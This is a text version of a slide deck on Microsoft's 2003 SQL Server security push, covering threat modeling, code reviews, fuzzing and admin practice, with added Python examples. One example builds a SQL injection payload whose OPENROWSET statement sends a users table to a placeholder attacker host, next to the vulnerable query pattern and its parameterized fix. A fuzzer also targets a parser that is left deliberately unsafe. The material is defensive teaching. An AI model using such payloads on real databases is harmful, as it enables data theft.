Security Process & You: SQL Server Case Study
James Hamilton, General Manager, SQL Server Webdata Development & Security Architect
Agenda
• Risk Escalating Rapidly
• SQL Injection Demo
• Case Study: SQL Server Security Push
• SQL Server Lessons Learned
• Security Tools & Automation
• Admin, Data Protection, & App Design
• Summary
Incidents Reported Industry Wide
CERT/CC incident statistics, 1988 through 2003
• Incident: a single security issue, grouping together all impacts of that issue
• Issue: disruption, DoS, loss of data, misuse, damage, loss of confidentiality
[Chart: incidents reported per year, 1988 to 2003; y-axis 0 to 90,000 incidents]
Source: http://www.cert.org/stats/cert_stats.html
Know Your Enemy
• Black hat community sharing
• Port scanners
• Brute force password crackers
• Dictionary-based password crackers
• Network sniffers
• De-compilers and debuggers
• Cracker tools
Data Thief Architecture
[Diagram: attacker's LocalDB <-> Vulnerable Application <-> App. Database]
1. Attack string: form values appended with an extra SQL statement
2. SQL-injected query: contains an OPENROWSET statement
3. The SQL-injected OPENROWSET statement causes the remote DB to connect back to the attacker's DB, sending back useful data
Data Thief Demonstration
Author: Cesar Cerrudo
Presented by Girish Chander, SQL Server Security PM
Security Push Timeline
Preparation Phase (3/15/2003) -> Security Push (5/1/2003) -> Push Follow-on (8/1/2003)
Push Preparation
• Goal: full 800-person team productive from the start
• Identify components
• Complete threat models
• Complete education
• Select push start date
• Security plan
• Security reps from each team
• Set triage bars
• Infrastructure set-up
Security Push
• 5 million+ lines of code reviewed
• Two releases in service, one more release in development
• 100% team focus during push: Dev, Test, PM, & UE; no other non-security work
• Three-pronged approach: targeted code reviews; tools targeting security; threat-driven reviews & testing
Push Prep: Communications
• Learning from other teams' experiences: Windows, VS .NET, & IIS preceded SQL
• Team readiness critical: don't start the security push until the team is prepared
• Security push plan: motivation, goals, approach, process, fix bar, ...
• Education plan for the team
• Web site set up for general announcements & communication
Push Prep: Training
• Security training for every team member: mandatory training for architects, PMs, developers & testers
• Material covered includes: threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense
• Video-taped training for new team members
• Security talk series: more detail on important security-related topics; staying current with evolving threats
• On-demand webcasts (search on security): http://www.microsoft.com/usa/webcasts/ondemand/default.asp
Push Prep: Infrastructure Ready
• Cross-component team to drive the push: SQL Security Leads
• Bug tracking guidelines detailed: classification of bugs and threats
• Separate bug-tracking DB for tracking file reviews: tracks code review progress & completeness
• Identification of components: 228 components; risk level assessed for each; threat models for each component
• Getting security tools running & building skills
• Clear fix criteria set
• Tracking progress is critical
Push: Threat Modeling Process
[Process diagram]
1. Collect background information: use scenarios; implementation assumptions; external dependencies; external security notes; internal security notes
2. Model the system: entry points; assets; trust levels; data flow diagrams / process models
3. Determine threats: identify threats; analyze threats / determine vulnerabilities
• A process to understand and document threats to a system
• Methodical and complete
• Describes the system's threat profile
• Goal is to find design-level issues before code is written
Push: Example Data Flow Diagram
[Diagram not reproduced in this extraction]
Push: Threat Modeling
• Threats must be understood to build secure systems: every spec/design goes through threat analysis
• Model of the component is created (typically a DFD)
• Threats categorized based on STRIDE
• Severity ranked based on DREAD, NOT on how hard it is to fix
STRIDE:
• S - Spoofing
• T - Tampering of data
• R - Repudiation
• I - Information disclosure
• D - Denial of service
• E - Escalation of privileges
DREAD:
• D - Damage potential
• R - Reproducibility
• E - Exploitability
• A - Affected users
• D - Discoverability
Push: Security SWAT Team
• Central team focused on cross-component analysis
• Members chosen from different teams
• Build and share security expertise
• Overall approach: met on a daily basis; chose the component based on priority & risk; invited relevant team members for that component; collectively brainstormed to ferret out cross-component threats
• Experience: an effective approach, now part of an ongoing, regular effort to audit product security
Push: Dead Code Removal
• Dead code removal is code hygiene & work reduction: why maintain & review code that never executes? (The usual objection: code in the product might be used in future.)
• Dead code detector built from a code coverage tool: analyzes compiled binaries; automatically files bugs
• One bug per file; bug assigned to the owner or last modifier
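Added example, not the deck's detector: the same idea (coverage run, never-executed functions, one bug per file assigned to the owner or last modifier) applied to Python functions, using the interpreter's sys.settrace hook as the coverage source. The sample functions, the file/owner index and the workload are all constructed for the example; the real tool worked on compiled binaries.

```python
import sys

# Constructed sample "product": three handlers that pretend to live in two source files.
def handle_login(user):
    return "login:" + user


def handle_logout(user):
    return "logout:" + user


def legacy_export(user):           # nothing in the product calls this any more
    return "export:" + user


# Constructed metadata the detector needs: owning file and owner/last modifier per function.
CODE_INDEX = {
    "handle_login":  {"file": "auth/session.c", "owner": "dev-auth"},
    "handle_logout": {"file": "auth/session.c", "owner": "dev-auth"},
    "legacy_export": {"file": "tools/export.c", "owner": "dev-legacy"},
}
FUNCS = {"handle_login": handle_login, "handle_logout": handle_logout,
         "legacy_export": legacy_export}

# Constructed workload standing in for the product's test run under the coverage tool.
WORKLOAD = [("handle_login", "alice"), ("handle_logout", "alice"), ("handle_login", "bob")]


def run_with_coverage(funcs, workload):
    """Execute the workload under a trace hook; return the names of functions entered."""
    hit = set()

    def tracer(frame, event, arg):
        if event == "call":                 # fired once per Python function entry
            hit.add(frame.f_code.co_name)
        return None                         # no line-level tracing needed

    previous = sys.gettrace()
    sys.settrace(tracer)
    try:
        for name, arg in workload:
            funcs[name](arg)
    finally:
        sys.settrace(previous)              # restore whatever tracer was installed before
    return hit


def find_dead_code(code_index, hit):
    """Functions the coverage run never entered."""
    return sorted(name for name in code_index if name not in hit)


def file_bugs(code_index, dead):
    """One bug per file listing its dead functions, assigned to that file's owner."""
    bugs = {}
    for name in dead:
        meta = code_index[name]
        bug = bugs.setdefault(meta["file"], {"assignee": meta["owner"], "dead_functions": []})
        bug["dead_functions"].append(name)
    return bugs


def run_detector():
    hit = run_with_coverage(FUNCS, WORKLOAD)
    return file_bugs(CODE_INDEX, find_dead_code(CODE_INDEX, hit))


if __name__ == "__main__":
    for path, bug in run_detector().items():
        print(f"BUG [{path}] -> {bug['assignee']}: dead functions {bug['dead_functions']}")
```

The detector is only as good as the workload: a function that is merely untested by the coverage run is indistinguishable from one that is truly unreachable, which is why the bug goes to the owner for a decision rather than being auto-deleted.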
Push: Code Reviews
• Threat-model-directed & tools-driven reviews
• Code review teams set up: typically at least 2 developers and 1 tester; the code review driver is not the code owner; the tester files bugs & scribes (some teams rotated roles)
• Code review experience: teams progressively became more efficient; the first 90 minutes are the most effective; a pass over the code by the reviewer prior to the review helped; a presentation by the code owner was very helpful; averaged 800-1200 lines reviewed per team per day
Push: Analytical Security Testing
A testing method that simulates how an attacker operates
• Decompose the app (threat-model driven)
• Identify interfaces
• Enumerate input points: sockets, pipes, registry, files, RPC, command-line args, etc.
• Enumerate data structures: C/C++ struct data, HTTP body, HTTP headers, HTTP header data, other protocol headers, query strings, bit flags
• Attack all data structures, wire formats, and input data
Push: Attack Team
• Red Team: Microsoft-wide ethical cracking group
• 50-50 split: reactive (analysis of reported bugs) and proactive (security reviews)
• Both formal and informal security reviews; formal reviews scoped by risk exposure: the greater the exposure, the deeper the review
• Analytical security testing: advanced fuzz & data mutation tools developed
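Added example (not from the deck and not Microsoft's fuzz tooling): a minimal data-mutation fuzzer in Python for the "attack all data structures, wire formats, and input data" step above. It runs a set of mutators (bit flips, length-field boundary values, truncation, flag stuffing) over a seed message and classifies each outcome, first against a parser that trusts its length field and then against the corrected parser. The wire format, both parsers, the mutators and the seed message are assumptions made for the example.

```python
import random
import struct

# Constructed toy wire format (not a real protocol):
#   flags (1 byte) | payload length (2 bytes, big-endian) | payload | XOR checksum (1 byte)
HEADER = struct.Struct(">BH")


def xor_checksum(payload: bytes) -> int:
    chk = 0
    for b in payload:
        chk ^= b
    return chk


def encode(flags: int, payload: bytes) -> bytes:
    """Build a well-formed message; the fuzzer mutates this seed."""
    return HEADER.pack(flags, len(payload)) + payload + bytes([xor_checksum(payload)])


def parse_vulnerable(data: bytes):
    """Trusts the length field: the checksum index is attacker controlled."""
    flags, length = HEADER.unpack_from(data, 0)
    payload = data[3:3 + length]
    if data[3 + length] != xor_checksum(payload):   # BUG: may index past the buffer
        raise ValueError("checksum mismatch")
    return flags, payload


def parse_fixed(data: bytes):
    """Validates every length against the buffer before using it."""
    if len(data) < HEADER.size + 1:
        raise ValueError("short header")
    flags, length = HEADER.unpack_from(data, 0)
    if HEADER.size + length + 1 > len(data):
        raise ValueError("length field exceeds buffer")
    payload = data[3:3 + length]
    if data[3 + length] != xor_checksum(payload):
        raise ValueError("checksum mismatch")
    return flags, payload


# Mutators: each takes the seed message and an RNG and returns one attack input.
def flip_random_bit(msg, rng):
    i = rng.randrange(len(msg))
    return msg[:i] + bytes([msg[i] ^ (1 << rng.randrange(8))]) + msg[i + 1:]


def set_length_max(msg, rng):           # length field = 0xFFFF
    return msg[:1] + b"\xff\xff" + msg[3:]


def set_length_plus_one(msg, rng):      # off-by-one past the real payload
    length = struct.unpack(">H", msg[1:3])[0]
    return msg[:1] + struct.pack(">H", length + 1) + msg[3:]


def truncate_last_byte(msg, rng):       # header claims more data than arrived
    return msg[:-1]


def set_all_flags(msg, rng):            # every bit flag on at once
    return b"\xff" + msg[1:]


MUTATORS = [flip_random_bit, set_length_max, set_length_plus_one,
            truncate_last_byte, set_all_flags]


def fuzz(parser, seed_msg: bytes, rounds: int = 50, seed: int = 1) -> dict:
    """Apply the mutators in rotation and classify each result.

    'rejected' = parser raised ValueError, its documented way to refuse input;
    'crash'    = any other exception, i.e. a bug (the Python analogue of an
                 out-of-bounds read in native code).
    """
    rng = random.Random(seed)           # fixed seed so runs are reproducible
    outcome = {"ok": 0, "rejected": 0, "crash": 0, "crashers": []}
    for i in range(rounds):
        mutator = MUTATORS[i % len(MUTATORS)]
        data = mutator(seed_msg, rng)
        try:
            parser(data)
            outcome["ok"] += 1
        except ValueError:
            outcome["rejected"] += 1
        except Exception as exc:        # IndexError, struct.error, ...
            outcome["crash"] += 1
            outcome["crashers"].append((mutator.__name__, type(exc).__name__, data))
    return outcome


if __name__ == "__main__":
    seed_msg = encode(0x01, b"hello")
    for parser in (parse_vulnerable, parse_fixed):
        result = fuzz(parser, seed_msg)
        print(parser.__name__, {k: v for k, v in result.items() if k != "crashers"})
        for name, err, data in result["crashers"][:3]:
            print("   ", name, "->", err, data.hex())
```

Every length-field mutation crashes the vulnerable parser and is cleanly rejected by the fixed one; the flag-stuffing mutation parses successfully in both, which is the correct answer for a field the parser does not use to index memory. Reproducibility of each crasher (the saved input and mutator name) is what makes the finding triageable under DREAD.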
Follow-on: What Was Learned?
• Set realistic schedules
• Get training done before starting
• Invest in tools early & aggressively
• Clearly identify system components early
• Code reviews: provide guidelines & goals for each review
• Security focus improved overall system quality: cross-component interactions better understood; improved both functional & penetration testing
• Define unambiguous exit criteria
• Clear progress-tracking metrics required
• Process sometimes interferes with progress
Development Tools
• Engineers are good at finding specific vulnerabilities (innovation required), but not good at reliably finding all instances of a specific bug class across millions of lines of code
• Focus on tools to supplement manual efforts: tools that can help identify issues in code; managed code is part of the answer
• Development tools used: PREfix & PREfast; FxCop; compiler options /GS and /SAFESEH; OS-level support: NOEXECUTE (data execution prevention)
Sample PREfast Defect

    ...
    CHAR buff[MAX_PATH];
    GetWindowsDirectory(buff, sizeof(buff));   /* PREfast warning: failure to check return value.
                                                  GetWindowsDirectory can fail in low-memory
                                                  situations; on failure buff is not guaranteed to
                                                  hold a valid path. */
    SetCurrentDirectory(buff);                 /* ...and the unchecked buffer is then used as a path */
Example Defect Classes
• Resource leakage: leaking memory/resources
• Pointer management: dereferencing a NULL pointer; dereferencing an invalid pointer; dereferencing or returning a pointer to freed memory
• Illegal state: resource in an illegal state; illegal value; divide by zero; writing to a constant string
• Memory management: double frees; freeing a pointer to non-allocated memory (stack, global, etc.); freeing a pointer into the middle of a memory block
• Initialization: using uninitialized memory; freeing or dereferencing an uninitialized pointer
• Bounds violations: overrun & underrun; failure to validate buffer size
• Managed code avoids many of these issues without post-authoring analysis tools
Application & DB Administration
Basic security practices:
• Automated enterprise software inventory
• Run MBSA frequently
• Apply the latest patches; use Windows Update or Software Update Services
• Audit authentication successes & failures at all tiers
• Corporate security policy with periodic audit
• Senior security czar with the ability to drive change
• Emergency response & disaster recovery plans
• Small admin group
• Minimum privilege & strong passwords enforced on all
Data Protection & App. Design
Data protection:
• Hot standby: clustering, log shipping, or DB mirroring (Yukon)
• Frequent backups: offsite with media encryption
• Offline, automated, non-production test systems
• Encrypted channels for transferring sensitive information
• Use integrated security with strong passwords
Isolate services:
• Do not install services on a domain controller
• Services should run under low-privileged accounts (not shared)
• Mid-tier/data-tier isolation with multiple firewalls
• Surface area reduction: remove/disable unneeded services
• No direct access to the data tier
Application design:
• Two-tier client-side doesn't work: security belongs in the data tier
• Apps that "hide" DB passwords in the client tier don't work
• Access only via carefully reviewed mid-tier code
• Validate all user input
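Added example (not from the deck and not Cesar Cerrudo's Data Thief code) tying the SQL injection demo earlier in the deck to the "validate all user input" and "access only via carefully reviewed mid-tier code" guidance above. It shows the vulnerable string-built query, the parameterized form, an allow-list check at the mid-tier, and the shape of a Data Thief attack string: a closing quote ends the intended statement and an appended OPENROWSET statement makes the server connect back to the attacker's database. It uses Python's sqlite3 module against a constructed in-memory users table; the table contents, the attack strings and the attacker address and credentials in the payload are assumptions.

```python
import re
import sqlite3

# Constructed sample table standing in for the "App. Database" in the Data Thief diagram.
SAMPLE_USERS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def build_unsafe_sql(name: str) -> str:
    """The vulnerable pattern: the form value is pasted straight into the statement text."""
    return "SELECT name, email FROM users WHERE name = '" + name + "'"


def lookup_unsafe(con, name: str):
    return con.execute(build_unsafe_sql(name)).fetchall()


def lookup_safe(con, name: str):
    """Parameterized: the value travels separately from the SQL text and cannot extend it."""
    return con.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


# Allow-list for the one field this mid-tier call accepts (constructed policy).
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def lookup_validated(con, name: str):
    """Defense in depth at the mid-tier: reject input that is not a plausible name,
    then still parameterize; validation is not a substitute for parameterization."""
    if not NAME_RE.match(name):
        raise ValueError("rejected user input")
    return lookup_safe(con, name)


# Illustrative attack strings (constructed). The first is the classic tautology.
# The second has the shape of a Data Thief payload: after the quote closes the
# application's statement, the attacker appends a SQL Server OPENROWSET statement
# that opens an outbound connection to the attacker's server (address and
# credentials here are placeholders) and inserts the victim table into it.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
DATA_THIEF_PAYLOAD = (
    "'; INSERT INTO OPENROWSET('SQLOLEDB', "
    "'Network=DBMSSOCN;Address=attacker.example.test,1433;uid=sa;pwd=x', "
    "'SELECT * FROM loot') SELECT * FROM users --"
)


def demo():
    con = make_db()
    return {
        "unsafe_tautology": lookup_unsafe(con, TAUTOLOGY_PAYLOAD),  # every row leaks
        "safe_tautology": lookup_safe(con, TAUTOLOGY_PAYLOAD),      # no such user: []
        "injected_sql_text": build_unsafe_sql(DATA_THIEF_PAYLOAD),  # what the server would receive
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

sqlite3's execute() refuses a second statement in a single call, so the OPENROWSET string is only built here, not run; SQL Server executes the whole batch it receives, which is exactly why Data Thief works and why the data tier must not trust the application's statement text. The parameterized lookup is the fix; the allow-list is the mid-tier check that limits what ever reaches the database, and a low-privileged mid-tier login without ad hoc distributed query rights is the data-tier control the deck's "security in the data tier" point calls for.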
Summary
• Threat profile increasing
• SQL Security Push case study: communication, training, infrastructure & tools, goals & exit criteria
• Security tools and techniques: threat models, Security SWAT team, code reviews, analytical security testing, attack team
• Application & DB administration; data protection & application design
Resources
• Microsoft Security and Privacy site: http://www.microsoft.com/security/
• SQL Security White paper: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/sql/maintain/security/sp3sec/Default.asp
• MBSA Home: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/tools/mbsahome.asp
Titles:
• Microsoft Windows 2000 Security Technical Reference
• Writing Secure Code, 2/e
• Building Secure Microsoft ASP.NET Applications